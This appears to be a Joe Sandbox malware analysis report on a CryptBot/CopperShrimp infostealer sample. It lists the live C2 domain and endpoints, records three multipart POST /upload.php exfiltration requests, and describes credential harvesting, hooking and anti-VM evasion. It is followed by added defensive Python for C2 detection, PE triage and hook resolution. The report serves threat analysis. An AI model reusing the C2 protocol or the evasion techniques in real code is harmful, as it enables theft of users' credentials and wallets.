Windows Analysis Report
vk2wTOx91s.exe

Overview

General Information

Sample name:vk2wTOx91s.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c
Analysis ID:1472695
MD5:2fbf1fc802ac4b340b1fd7b3e4659974
SHA1:463182267627d5ce5f3196479820e7bae4d18a52
SHA256:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c

Detection

CopperShrimp, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected CopperShrimp
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
Tries to evade analysis by executing a special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • vk2wTOx91s.exe (PID: 3788 cmdline: "C:\Users\user\Desktop\vk2wTOx91s.exe" MD5: 2FBF1FC802AC4B340B1FD7B3E4659974)
  • cleanup

Malware family (from Malpedia)

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of taking screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Extracted malware configuration

Cryptbot: {"C2 list": ["tztwo2ht.top"]}
CopperShrimp: {"C2 url": "tztwo2ht.top", "urls": ["/index.php", "/gate.php", "/zip.php", "/upload.php"]}
Yara matches

Source | Rule | Description | Author
Process Memory Space: vk2wTOx91s.exe PID: 3788 | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security
Process Memory Space: vk2wTOx91s.exe PID: 3788 | JoeSecurity_CopperShrimp | Yara detected CopperShrimp | Joe Security
0.2.vk2wTOx91s.exe.50000.0.unpack | JoeSecurity_CopperShrimp | Yara detected CopperShrimp | Joe Security

Sigma

No Sigma rule has matched

Snort IDS alerts

Timestamp: 07/13/24-19:08:46.717453 | SID: 2856511 | Source Port: 49704 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/13/24-19:08:46.291207 | SID: 2054383 | Source Port: 58241 | Destination Port: 53 | Protocol: UDP | Classtype: A Network Trojan was detected
Timestamp: 07/13/24-19:08:46.717453 | SID: 2054350 | Source Port: 49704 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected


        AV Detection

Source: https://brewdogebar.com/code.vue | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: CopperShrimp {"C2 url": "tztwo2ht.top", "urls": ["/index.php", "/gate.php", "/zip.php", "/upload.php"]}
Source: vk2wTOx91s.exe.3788.0.memstrmin | Malware Configuration Extractor: Cryptbot {"C2 list": ["tztwo2ht.top"]}
Source: https://brewdogebar.com/code.vue | Virustotal: Detection: 11%
Source: vk2wTOx91s.exe | ReversingLabs: Detection: 73%
Source: vk2wTOx91s.exe | Virustotal: Detection: 46%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: vk2wTOx91s.exe | Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_0005A6E0 CryptUnprotectData
Source: vk2wTOx91s.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vk2wTOx91s.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_00059040 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_0005EF00 FindFirstFileW
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\

        Networking

Source: Traffic | Snort IDS: 2054383 ET TROJAN Cryptbot CnC DGA Domain (two2) 192.168.2.5:58241 -> 1.1.1.1:53
Source: Traffic | Snort IDS: 2856511 ETPRO TROJAN Win32/CopperShrimp Stealer Related Activity (POST) 192.168.2.5:49704 -> 176.113.81.61:80
Source: Traffic | Snort IDS: 2054350 ET TROJAN Win32/Cryptbotv2 CnC Activity (POST) M4 192.168.2.5:49704 -> 176.113.81.61:80
Source: Malware configuration extractor | URLs: tztwo2ht.top (reported by both the Cryptbot and the CopperShrimp extractor)
Source: Joe Sandbox View | ASN Name: RETN-ASEU
Source: global traffic | HTTP traffic detected: three POST /upload.php HTTP/1.1 requests to tztwo2ht.top with identical headers apart from the multipart boundary and Content-Length:
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=<see below>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: <see below>
    Host: tztwo2ht.top
    Request 1: boundary=----Boundary77938395, Content-Length: 348
    Request 2: boundary=----Boundary40876462, Content-Length: 1424
    Request 3: boundary=----Boundary86828523, Content-Length: 79310
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: tztwo2ht.top
Source: vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://tztwo2ht.top/
Source: vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093528924.00000000016F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://tztwo2ht.top/upload.php
Source: vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://tztwo2ht.top/upload.phpe
Source: vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://tztwo2ht.top:80/upload.php
Source: vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093562903.0000000001713000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://tztwo2ht.top:80/upload.phpMicrosoft
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: vk2wTOx91s.exe, 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://brewdogebar.com/code.vue
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
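The C2 observations above (extracted configuration, three POST /upload.php requests, Snort hits on the same flow) are enough to write a network detection. The Python below is an added example, not part of the Joe Sandbox report and not the vendor's or the malware's code: it parses raw HTTP/1.1 requests, matches them against the extracted C2 host and script paths, and applies two traits visible in the captured POSTs, the `----Boundary` plus eight-digit multipart boundary and a Chrome User-Agent on a request that carries none of the Accept*/Origin headers a browser form submission sends. The three requests are rebuilt from the headers in the report with a constructed placeholder body; the benign fourth request is constructed for contrast. The boundary and missing-header heuristics are assumptions drawn from these three captures only.

```python
"""Score HTTP requests against the C2 indicators from the sandbox report.
Added example: constructed inputs, not data from the analysed sample's capture."""
import re

# Indicators taken from the report's extracted configuration.
C2_CONFIG = {
    "c2_hosts": {"tztwo2ht.top"},
    "c2_paths": {"/index.php", "/gate.php", "/zip.php", "/upload.php"},
}
# Heuristics derived from the three captured POSTs (assumption: they generalise).
BOUNDARY_RE = re.compile(r"^----Boundary\d{8}$")
CHROME_UA_RE = re.compile(r"Chrome/\d+(\.\d+){3} Safari/537\.36$")
# Headers a real Chrome form submission carries; the captured requests have none of them.
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding", "origin")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def score_request(req, config=C2_CONFIG):
    """Return the reasons this request looks like CryptBot/CopperShrimp C2 traffic."""
    h = req["headers"]
    reasons = []
    if h.get("host", "").lower() in config["c2_hosts"]:
        reasons.append("Host is an extracted C2 domain")
    if req["method"] == "POST" and req["path"] in config["c2_paths"]:
        reasons.append(f"POST to configured C2 script {req['path']}")
    ctype = h.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if ctype.startswith("multipart/form-data") and m and BOUNDARY_RE.match(m.group(1)):
        reasons.append("multipart boundary of the form ----Boundary<8 digits>")
    if CHROME_UA_RE.search(h.get("user-agent", "")) and not any(x in h for x in BROWSER_HEADERS):
        reasons.append("claims to be Chrome but sends no Accept*/Origin headers")
    return reasons


def is_c2_beacon(req, min_reasons=2):
    """Require two independent indicators so one coincidental hit does not alert."""
    return len(score_request(req)) >= min_reasons


def build_capture(boundary, length):
    """Rebuild one of the report's POST /upload.php requests; the body is a constructed placeholder."""
    body = f"--{boundary}\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n"
    return ("POST /upload.php HTTP/1.1\r\n"
            "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\n"
            f"Content-Length: {length}\r\nHost: tztwo2ht.top\r\n\r\n" + body)


CAPTURES = [build_capture("----Boundary77938395", 348),
            build_capture("----Boundary40876462", 1424),
            build_capture("----Boundary86828523", 79310)]

# Constructed benign request: a browser form upload to an unrelated host.
BENIGN = ("POST /upload.php HTTP/1.1\r\nHost: files.example.org\r\n"
          "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbC123xYz\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\n"
          "Accept: */*\r\nOrigin: https://files.example.org\r\nContent-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for raw in CAPTURES + [BENIGN]:
        req = parse_request(raw)
        print(req["headers"].get("host"), is_c2_beacon(req), score_request(req))
```

The benign request still scores one reason (a POST to a path named `/upload.php`), which is why `is_c2_beacon` demands two: the path list from the configuration is generic, and only the combination with the host, the boundary shape or the header profile is specific to this family.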

        System Summary

Source: vk2wTOx91s.exe | Static PE information: section names: .WaG, .[SL, .&ZK
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code functions flagged as potential crypto routines: 0_2_00053CD0, 0_2_0005EFB0, 0_2_000510A0, 0_2_0006B27D, 0_2_00053480, 0_2_00053580, 0_2_007B2642, 0_2_0070269F, 0_2_0005A8F0, 0_2_00051C40, 0_2_00052D00
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: String function: 0005F7F0 appears 52 times
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: String function: 0005F8B0 appears 41 times
Source: vk2wTOx91s.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vk2wTOx91s.exe | Static PE information: Section: .&ZK ZLIB complexity 0.992732498185058
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File created: C:\Users\user\AppData\Local\Poconusuri
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: vk2wTOx91s.exe, 00000000.00000003.2092393305.0000000001924000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2092651705.0000000001924000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string (schema of a Chromium "Login Data" database): CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Sections loaded, in order: apphelp.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, ondemandconnroutehelper.dll, dpapi.dll, cryptbase.dll, uxtheme.dll, windowscodecs.dll, ondemandconnroutehelper.dll, msasn1.dll, kernel.appcore.dll
Source: vk2wTOx91s.exe | Static file information: File size 1949184 > 1048576
Source: vk2wTOx91s.exe | Static PE information: Raw size of .&ZK is bigger than: 0x100000 < 0x1d9800
Source: vk2wTOx91s.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_000603D0 LoadLibraryW,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .&ZK
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_006EC4D1 pushfd ; ret 0_2_006EC50E
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_00774688 push ss; retf B8E1h 0_2_007746E3
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_006E7AFD push 80857E55h; retf 0_2_006E7B0A
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_006FFB21 push ecx; ret 0_2_006FFB34
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_006E8E7A pushfd ; retf 0_2_006E8E7E
Source: vk2wTOx91s.exe | Static PE information: section name: .&ZK entropy: 7.996151903965326
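The static findings above (three non-standard section names, two of them with special characters, an entry point inside `.&ZK`, and entropy 7.996 plus a raw size above 1 MiB for that section) are exactly the checks a triage script can reproduce without a sandbox. The following Python is an added example, not part of the report and not the vendor's code: it walks the PE headers with the standard library only, computes per-section Shannon entropy and emits the same class of findings. Because the analysed sample is not on this page, it runs against a constructed minimal PE32 that mimics the reported layout (`.text` plus `.WaG`, `.[SL` and `.&ZK`, entry point in `.&ZK`, pseudo-random data in that section); the thresholds (entropy at or above 7.9, raw size above 1 MiB) and the list of "standard" section names are the example's own assumptions.

```python
"""PE section triage with the standard library only (added example)."""
import hashlib
import math
import struct

SECTION_FMT = "<8sIIIIIIHHI"                 # IMAGE_SECTION_HEADER, 40 bytes
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".pdata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT"}
ALLOWED_NAME_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")


def shannon_entropy(buf):
    """Bits per byte, 0.0 .. 8.0; packed or encrypted data sits close to 8."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data):
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]           # 0x10B = PE32, 0x20B = PE32+
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from(SECTION_FMT, data, opt + opt_size + 40 * i)[:5]
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "vaddr": vaddr, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr,
            "entropy": shannon_entropy(data[rawptr:rawptr + rawsize]),
        })
    return {"pe32": magic == 0x10B, "entry_rva": entry_rva, "sections": sections}


def triage(data, entropy_threshold=7.9, big_raw=0x100000):
    """Reproduce the report's static section findings for any PE image."""
    pe = parse_pe(data)
    findings, entry_section = [], None
    for s in pe["sections"]:
        if s["vaddr"] <= pe["entry_rva"] < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
        if any(ch not in ALLOWED_NAME_CHARS for ch in s["name"]):
            findings.append(f"section name with special chars: {s['name']!r}")
        elif s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']!r}")
        if s["entropy"] >= entropy_threshold:
            findings.append(f"entropy {s['entropy']:.3f} in {s['name']!r}: packed or encrypted payload")
        if s["rawsize"] > big_raw:
            findings.append(f"raw size of {s['name']!r} is {s['rawsize']:#x} > {big_raw:#x}")
    if entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point in non-standard section {entry_section!r}")
    return {"pe32": pe["pe32"], "entry_section": entry_section,
            "sections": pe["sections"], "findings": findings}


def build_sample_pe(layout, align=0x200):
    """Constructed minimal PE32 for the demo: (name, raw bytes, is_entry) per section."""
    opt_size = 0xE0
    hdr_end = -(-(0x40 + 4 + 20 + opt_size + 40 * len(layout)) // align) * align
    raw_ptr, vaddr, entry_rva = hdr_end, 0x1000, 0
    sec_hdrs, payload = b"", b""
    for name, body, is_entry in layout:
        rawsize = -(-len(body) // align) * align
        if is_entry:
            entry_rva = vaddr + 0x10
        sec_hdrs += struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"), len(body), vaddr,
                                rawsize, raw_ptr, 0, 0, 0, 0, 0x60000020)
        payload += body.ljust(rawsize, b"\0")
        raw_ptr += rawsize
        vaddr += -(-rawsize // 0x1000) * 0x1000
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, opt_size, 0x0102)
    opt = (struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", entry_rva)).ljust(opt_size, b"\0")
    return (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(hdr_end, b"\0") + payload


# Deterministic pseudo-random bytes standing in for a packed section (constructed).
PACKED = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(2048))
SAMPLE_PE = build_sample_pe([
    (".text", b"\x55\x8b\xec\x33\xc0\x5d\xc3" * 100, False),   # low-entropy stub code
    (".WaG", b"\x00" * 0x200, False),
    (".[SL", b"\x00" * 0x200, False),
    (".&ZK", PACKED, True),                                      # entry point lives here
])
REPORT = triage(SAMPLE_PE)

if __name__ == "__main__":
    print("\n".join(REPORT["findings"]))
```

Run it and the findings list names `.WaG` as non-standard, `.[SL` and `.&ZK` as special-character names, `.&ZK` as high-entropy and as the entry-point section; pointing `triage()` at a real file instead of `SAMPLE_PE` needs no other change.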

        Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Memory written: PID: 3788 base: 1440005 value: E9 8B 2F AB 75
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Memory written: PID: 3788 base: 76EF2F90 value: E9 7A D0 54 8A
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Memory written: PID: 3788 base: 1450007 value: E9 EB DF AD 75
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Memory written: PID: 3788 base: 76F2DFF0 value: E9 1E 20 52 8A
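The four "Memory written" events above are the complete record of two inline hooks: each value is a five-byte near JMP (opcode E9 followed by a little-endian signed rel32), and the writes all happen inside PID 3788, the sample's own process. As an added example (not the report's or the vendor's tooling), the Python below resolves each jump target and pairs the writes up: the write inside a loaded module redirects the start of a function to the sample's detour, and the write a few bytes into the sample's own region jumps back to the hooked function just past the bytes the detour overwrote, which is the trampoline. The rule that addresses at or above 0x70000000 belong to mapped system DLLs in this 32-bit process is the example's own assumption; the report does not name the hooked module.

```python
"""Resolve and pair the E9 jump writes a sandbox reports as 'Memory written' (added example)."""
import struct

# (base, bytes written) copied from the report's Hooking section, PID 3788.
WRITES = [
    (0x01440005, bytes.fromhex("E98B2FAB75")),
    (0x76EF2F90, bytes.fromhex("E97AD0548A")),
    (0x01450007, bytes.fromhex("E9EBDFAD75")),
    (0x76F2DFF0, bytes.fromhex("E91E20528A")),
]


def jmp_target(base, code):
    """Destination of a near relative JMP written at `base` (32-bit address space)."""
    if len(code) != 5 or code[0] != 0xE9:
        raise ValueError("not a 5-byte E9 jmp")
    rel32 = struct.unpack("<i", code[1:])[0]      # signed displacement, little-endian
    return (base + 5 + rel32) & 0xFFFFFFFF        # relative to the next instruction


def in_module(addr):
    """Assumption for this WOW64 process: system DLLs map high, the sample's detour memory low."""
    return addr >= 0x70000000


def pair_hooks(writes, max_stolen=16):
    """Match each hooked function with its trampoline.

    hook:       write inside a module whose target is outside modules (the detour)
    trampoline: write outside modules whose target is hook.base + n, where n is the
                number of original bytes the hook overwrote and relocated (5 .. max_stolen)
    A matching trampoline must live in the same 64 KiB region the detour points into.
    """
    resolved = [(base, jmp_target(base, code)) for base, code in writes]
    hooks = [(b, t) for b, t in resolved if in_module(b) and not in_module(t)]
    tramps = [(b, t) for b, t in resolved if not in_module(b) and in_module(t)]
    pairs = []
    for hbase, detour in hooks:
        for tbase, resume in tramps:
            stolen = resume - hbase
            if 5 <= stolen <= max_stolen and (detour >> 16) == (tbase >> 16):
                pairs.append({"hooked_function": hbase, "detour": detour,
                              "trampoline": tbase, "resume_at": resume,
                              "stolen_bytes": stolen})
    return pairs


def describe(pair):
    """One line per hook, in the form an analyst would paste into notes."""
    return (f"function at {pair['hooked_function']:#010x} now jumps to detour {pair['detour']:#010x}; "
            f"trampoline jump at {pair['trampoline']:#010x} follows {pair['stolen_bytes']} relocated "
            f"bytes and resumes at {pair['resume_at']:#010x}")


if __name__ == "__main__":
    for p in pair_hooks(WRITES):
        print(describe(p))
```

For the report's data the first hook overwrote five bytes (trampoline jump at 0x01440005 resumes at 0x76EF2F95) and the second seven (jump at 0x01450007 resumes at 0x76F2DFF7), which tells you the length of the prologue instructions that were relocated even though the report never shows them.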

        Malware Analysis System Evasion

Source: C:\Users\user\Desktop\vk2wTOx91s.exe | API/Special instruction interceptor: Addresses: 8138A8, 9A9ECC, 9A0717, 823FE1, 833491, 97EE48, 81FF81, 9C5180, 980BC5, 9C4BBE
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Special instruction interceptor: First address: 9E7998 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (display-adapter device class, a common check for a virtual GPU)
Source: C:\Users\user\Desktop\vk2wTOx91s.exe TID: 3440 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_00059040 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_0005EF00 FindFirstFileW
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ and, beneath it, Profiles\, Profiles\v6zchhhv.default-release\, Profiles\v6zchhhv.default-release\cache2\, Profiles\v6zchhhv.default-release\cache2\entries\, Profiles\v6zchhhv.default-release\cache2\doomed\
Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory strings carrying the "VMware20,1" marker that triggered the VM-detection heuristic (the text in front of the marker, bank and broker page titles and password-blocklist test entries, reads like browser-profile data the sample loaded into memory rather than code of its own):
    Canara Transaction PasswordVMware20,11696428655x
    discord.comVMware20,11696428655f
    interactivebrokers.co.inVMware20,11696428655d
    Interactive Brokers - COM.HKVMware20,11696428655
    global block list test formVMware20,11696428655
    Canara Transaction PasswordVMware20,11696428655}
    Interactive Brokers - EU East & CentralVMware20,11696428655
    Canara Change Transaction PasswordVMware20,11696428655^
    account.microsoft.com/profileVMware20,11696428655u
    secure.bankofamerica.comVMware20,11696428655|UE
    www.interactivebrokers.comVMware20,11696428655}
    Interactive Brokers - GDCDYNVMware20,11696428655p
    Interactive Brokers - EU WestVMware20,11696428655n
    outlook.office365.comVMware20,11696428655t
    microsoft.visualstudio.comVMware20,11696428655x
    Canara Change Transaction PasswordVMware20,11696428655
    outlook.office.comVMware20,11696428655s
    www.interactivebrokers.co.inVMware20,11696428655~
    ms.portal.azure.comVMware20,11696428655
    AMC password management pageVMware20,11696428655
    tasks.office.comVMware20,11696428655o
    Interactive Brokers - NDCDYNVMware20,11696428655z
    turbotax.intuit.comVMware20,11696428655t
    interactivebrokers.comVMware20,11696428655
    Interactive Brokers - non-EU EuropeVMware20,11696428655
    dev.azure.comVMware20,11696428655j
    netportal.hdfcbank.comVMware20,11696428655
    Interactive Brokers - HKVMware20,11696428655]
    bankofamerica.comVMware20,11696428655x
    trackpan.utiitsl.comVMware20,11696428655h
    Test URL for global passwords blocklistVMware20,11696428655
